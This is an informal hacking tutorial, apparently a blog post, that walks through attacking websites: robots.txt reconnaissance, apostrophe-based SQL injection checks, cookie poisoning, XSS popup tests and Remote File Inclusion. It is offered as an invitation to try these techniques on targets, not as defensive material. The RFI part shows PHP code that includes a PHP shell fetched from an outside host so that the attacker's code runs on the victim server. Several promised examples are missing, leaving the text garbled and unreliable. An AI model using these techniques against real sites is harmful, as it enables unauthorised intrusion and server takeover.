This tutorial just 4 share….. Cekidot…
1. Check for robots.txt
Most common directory is
This can contain lots of info, even though not all sites have it. It can normally indicate where the admin directory is too.
robots.txt is used to restrict the Google bot’s access in certain parts of a forum or a website.
It looks like this:
2. Check for SQL Injection vulnerabilities
This is done by putting a ‘ (apostrophe) in the end.
If you see some kind of an error, then most likely, the site is vulnerable.
This is classic, or error based SQL Injection. We’ll discuss blind SQL injection another time.
3. Cookie poisoning
Even though most sites nowadays filter this, it wouldn’t kill you to try.
It’s really simple, try this in the address bar:
In some cases this may spill out your username and password.
This is the part where you try the famous line…
Similar to SQL injection, you guessed it.
4. Check if site is vulnerable to Cross Site Script (XSS)
Check if the site is vulnerable by typing this in a webform or something.
If site is vulnerable, then you will get a popup message saying awdwdadwd (yes this was random).
You can find more detailed articles on XSS on milw0rm or something.
5. Remote File Inclusion (RFI) — My Fav!
RFI or Remote File Inclusion is where the attacker tries to inject his own PHP code to your PHP apps…and if he’s successful, then he can do whatever he wants on the server.
Ok, so, lets say we have a website coded in PHP and it uses something like page=page.html to see which page is to be displayed. The code will look something like this
$file =$_GET[‘page’]; //ourpage
What this means is, whatever gets passed to page, it will get included inside the PHP page. Goes like this:
The actual code the webserver is executing looks like this:
$file =”http://www.hackersite.com/phpshell.txt?”; //$_GET[‘page’];
include($file); //$file is the PHP shell
We just executed our code on our targeted server.
Well this was all folks, hope you enjoyed